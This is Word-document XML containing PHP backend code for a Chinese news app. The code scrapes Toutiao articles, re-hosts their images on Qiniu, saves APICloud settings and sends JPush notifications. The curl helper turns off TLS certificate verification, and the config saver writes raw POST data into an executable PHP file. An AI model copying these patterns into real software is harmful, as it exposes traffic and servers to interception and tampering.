    <w:p w14:paraId="21D25B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if(!empty(pathinfo($url)['basename'])){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E02D4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pathinfo($url)['basename'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DA20C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B54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1EC9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请输入网址</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>2']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BF36E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F311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preg_match_all("/\d+/",$url,$arr);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BEC82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if(empty($arr['0'])){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B69AB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json(['err'=&gt;'id</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>正则获取错误</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FDBA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CE1F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$id = $arr['0']['0'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="038B20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 input('mychannel/d');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B7CE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if(!$mychannel){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50D36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频道</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>mychannel</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>不能为空</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A7B3D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EBCC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$this-&gt;get('toutiao/view/id/'.$id,true);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2519C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if(!empty($data['user'])){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="698A8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 = $data['user'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0180B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$uid=Db::name('member')-&gt;where(['toutiao_uid'=&gt;$v['id']])-&gt;value('id');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="423792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68F30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$uid;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D7117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A9E6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ECCE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if($data['mychannel'] == $mychannel){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DA9D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if($data['image']){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17A1C5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  =   $this-&gt;qiniu($data['image']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="342FC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F445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if($data['mychannel'] == 1){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E2456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$this-&gt;get('toutiao/body_info/id/'.$id);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13155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$data['text']   =   $this-&gt;_html_content($text);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35C81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if($data['mychannel'] == 2){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57B2C2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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FE12A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($data['images'] as $k =&gt; $v) {   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C17EC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$img[$k]['img']  = $this-&gt;qiniu($v['img']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CD2FD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$v['text'] = strip_tags($v['text']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="054A88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$v['text'] = preg_replace("/\\r\\n/", '', $v['text']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1759A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$v['text'] = preg_replace("/\\r/", '', $v['text']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="655010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$v['text'] = preg_replace("/\s*/", '', $v['text']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B98F2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$img[$k]['text'] = preg_replace("/\\n/", '', $v['text']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45AD57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$img[$k]['text'] = $v['text'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="260D3E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if(!$data['image'] &amp;&amp; $k==1){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6529E3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            =          $img[$k]['img'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="130EC2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58C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0AFE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 = $img;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DDC3F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if($data['mychannel'] == 3){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="656BC9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 = $this-&gt;qiniu($data['video'],'.mp4');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="730F2C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39C1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json(['ret'=&gt;$data]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AC6FE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2633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 = Db::name('mychannel')-&gt;where('id',$mychannel)-&gt;cache(true)-&gt;value('title');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="079F30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当前频道是</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>&lt;b&gt;'._mychannelName($mychannel).'&lt;/b&gt;,</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>采集网址频道是</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>&lt;b&gt;'._mychannelName($data['mychannel']).'&lt;/b&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，请输入</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>&lt;b&gt;'._mychannelName($mychannel).'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>频道</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>&lt;/b&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>采集网址</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0108C2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1609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804C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_html_content($article){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="251177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preg_match_all("/src=\"(.*?)\"/", $article,$img);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A30B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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="292B8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063C03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($img[1] as $k  =&gt;  $v) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4769F2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$img_1=$v;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46910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$img_2=_imgUrl().$this-&gt;qiniu($img_1,'article');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45F58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if($img_1 &amp;&amp; $img_2){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77018C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$article=str_replace($img_1,$img_2,$article);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="116582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568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DB18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436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$article=preg_replace("/(img_width.*?)\"(.*?)\"/si","",$article); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E118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$article=preg_replace("/(img_height.*?)\"(.*?)\"/si","",$article); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="029780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$article=preg_replace("/(onerror.*?)\"(.*?)\"/si","",$article); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="093086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$article=preg_replace("/(inline.*?)\"(.*?)\"/si","",$article);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25B6F0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$article=preg_replace("/&lt;(p.*?)&gt;/si","&lt;p&gt;",$article); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="763AFA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$article=preg_replace("/&lt;(\/?figure.*?)&gt;/si","",$article); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F9F07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$article=preg_replace("/&lt;(\/?a.*?)&gt;/si","",$article); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22E932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$article=preg_replace("/(data.*?)\"(.*?)\"/si","",$article); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6737C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$article=preg_replace("/(width.*?)\"(.*?)\"/si","",$article); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="618FDE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$article=preg_replace("/(alt.*?)\"(.*?)\"/si","",$article); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="674F90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$article=preg_replace("/(style.*?)\"(.*?)\"/si","",$article); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7272F3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$article;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EE4C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69F5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DF614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64768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325D6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43E8D3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55FDAC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7FCD7B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JPush\Client as JPush;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="091971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Apicloud extends Common</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3021F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30AD8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config(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72320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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04DA94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$this-&gt;assign('cfg',$config['apicloud']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50808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E76AD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59E0D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20C4B6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$data=$post;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35A6F8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618F68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$data=var_export($data, true);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55AF87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$data=str_replace("array", "return", $data);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49DF74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1C8BBE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3808E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$data="&lt;?php\r\n".$data;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="479BA4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file_put_contents(APP_PATH.'extra/apicloud.php', print_r($data, true));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38F3E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00272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92FF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保存失败</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40615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67E2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97BA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584B98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2FE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37C95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$data=$this-&gt;fetch();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D8DFF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8CB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17B06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B543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html($url,$method='GET',$body=''){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FF22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config()['apicloud'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37191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$now = time();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57F00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$httpheader = array(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E5B4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"X-APICloud-AppId: ".$config['appid'],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F8A16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"X-APICloud-AppKey: ".sha1($config['appid']."UZ".$config['appkey']."UZ".$now).".".$now</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F98F2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998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$curl=curl_init();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="731864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CURLOPT_URL, $url); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09C65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CURLOPT_CUSTOMREQUEST, $method);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="183D2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CURLOPT_HTTPHEADER , array("X-HTTP-Method-Override: $method"));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C8AB3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CURLOPT_HTTPHEADER , $httpheader);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70074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CURLOPT_SSL_VERIFYPEER, 0); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="620C5A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CURLOPT_SSL_VERIFYHOST, 0); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EF3F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CURLOPT_USERAGENT, $_SERVER['HTTP_USER_AGENT']); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4152D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CURLOPT_AUTOREFERER, 1); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2296FB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CURLOPT_POSTFIELDS, $body); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="154AE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CURLOPT_TIMEOUT, 30); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="754C66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CURLOPT_HEADER, 0); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EF817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CURLOPT_RETURNTRANSFER, 1); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EB9A6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$totalline = curl_exec($curl); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="133CF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(curl_errno($curl)) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25570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'Errno'.curl_error($curl);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1713B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A6C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curl_close($curl); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D24D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$totalline; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A56E2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372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records(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18CE2F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38F9C5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$search_name=input('param.title');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="612889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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B3B4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$map['title']  = ['like','%'.$search_name.'%'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B3E90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27BB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Db::name('push')-&gt;where($map)-&gt;order('time desc,id desc')-&gt;paginate('',false,['query'=&gt;request()-&gt;param()]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="314573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$db-&gt;toarray()['data'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="507B95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3025CE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if($v['aid']){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35631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Db::name('article')-&gt;field('id,title,description,content,video,mychannel')-&gt;find($v['aid']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="346C9B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$this-&gt;_content($article['description']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4597F9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if(!$content){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="725A6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$this-&gt;_content($article['content']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10B5EC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3BF5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$data[$k]['title'] = $article['title'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D33E8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$data[$k]['content'] = $content;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B770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C06E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1654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54FC9F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$db-&gt;render();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A8825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54132F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$this-&gt;fetch('list');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F1EE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CF0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012D0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8B17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A914D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$post['title'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03646B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$post['content'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E8C50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       =   $post['type'];  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27EF0D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$data['platform']   =   $post['platform'];  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18E1E8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        =   $post['aid'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DA93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$data['jpush_id']   =   $post['jpush_id']; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5065FF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if($data['jpush_id']){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="741A01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$jpush_id = Db::name('member_jpush')-&gt;where(['uid'=&gt;$data['jpush_id']])-&gt;value('jpush_id');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24C1D3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if(!$jpush_id){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AE565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未绑定推送设备</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D66A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D83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$data['jpush_id']   =   $jpush_id; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FE267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A0EF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$this-&gt;jpush($data);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7811D4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if(!empty($url['http_code']) &amp;&amp; $url['http_code'] == 200){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F16D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0B0329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Db::name('push')-&gt;insert($data);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="135BA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t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>推送成功，</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>分钟内生效</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F4CC0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E78BE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推送失败！错误提示：</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'.$url['msg']]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79303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A09A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E5B37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$this-&gt;html('https:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C716E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json_decode($url,true);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06AA31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if($url['status'] == 1){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A470E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230509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Db::name('push')-&gt;insert($data);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1348EB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t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>推送成功，</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>分钟内生效</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F7D97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019E7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推送失败！</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>msg:'.$url['msg']]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CD608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1BCF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7FBE7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5E1CC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277A1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27528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jpush($data){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53A727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config()['apicloud'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E9BB1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$client = new JPush($config['app_key'], $config['master_secret']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45FE1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 = !empty($data['aid']) ? $data['aid'] : '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FC3FF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if($data['aid']){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D2384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w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Db::name('article')-&gt;field('id,title,description,content,video,mychannel')-&gt;find($data['aid']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3691A0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BC5B5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Validate(['title|</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>标题</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>' =&gt; 'require', 'content|</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>内容</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>' =&gt; 'require','type' =&gt; 'number|require']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AE2C2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['title' =&gt; $data['title'], 'content' =&gt; $data['content'], 'type'=&gt;$data['type']];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="284DDA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4DC96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['msg' =&gt; $validate-&gt;getError(),'http_code'=&gt;201];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41E8C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F853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956D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if($data['platform'] == 1){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D8D6E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$setPlatform = ['ios'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05DA7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if($data['platform'] == 2){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="294C8D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$setPlatform = ['android'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78D1D6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511C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$setPlatform = ['ios','android'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="370BEC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88E3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219202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 = $client-&gt;push();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="798979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$response-&gt;setPlatform($setPlatform);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A11A7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if($data['jpush_id']){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="024B1C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$response-&gt;addRegistrationId($data['jpush_id']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1690F5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2260B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$response-&gt;addAllAudience(); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="189EEC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F3D7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if($data['aid']){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C9E3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$this-&gt;_content($article['description']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BBA3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if(!$content){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="719B59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$this-&gt;_content($article['content']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FC2D3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326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$response-&gt;androidNotification($content, array(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4886C7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$article['title'],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75AA17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'extras' =&gt; [</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1947C7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'mychannel'=&gt;$article['mychannel'],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71C055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'id'=&gt;$data['aid'],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A9B11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 =&gt;  _imgUrl().$article['video'],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29EA8F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8CD8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56F4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$response-&gt;iosNotification($article['title'], array(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16E09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'extras' =&gt; [</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41A0D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'mychannel'=&gt;$article['mychannel'],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53A94B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'id'=&gt;$data['aid'],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20C4DF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 =&gt;  _imgUrl().$article['video'],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BB0C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A53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4450C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$response-&gt;options(['apns_production'=&gt;true]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28017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C8B38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$response-&gt;androidNotification(input('content'), array(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="640B48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input('title'),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FD8F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6E4D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$response-&gt;iosNotification(input('title')); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F90C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$response-&gt;options(['apns_production'=&gt;true]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="509B3B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E56E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 = $response-&gt;send();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17E62C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($response);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7444FD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(\JPush\Exceptions\APIConnectionException $e) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15C91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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E21CF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(\JPush\Exceptions\APIRequestException $e) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="522042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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AA5D1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64B5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09EB6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43C30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$pusher = $client-&gt;push()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B9C0B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-&gt;androidNotification('Hello Android', array(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C7FB3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'hello jpush',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A092D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'extras' =&gt; array(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D270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=&gt; 'value',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DBDE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'jiguang'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="595FE4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C311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7DC8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print_r($client);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7074F9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(\JPush\Exceptions\APIConnectionException $e) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52A6DC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$e;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="665DCF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(\JPush\Exceptions\APIRequestException $e) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37DE4E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$e;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="667327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AD0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C0AD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$push_payload = $client-&gt;push()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="166397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-&gt;setPlatform('all')</w:t>
      </w:r>
    </w:p>
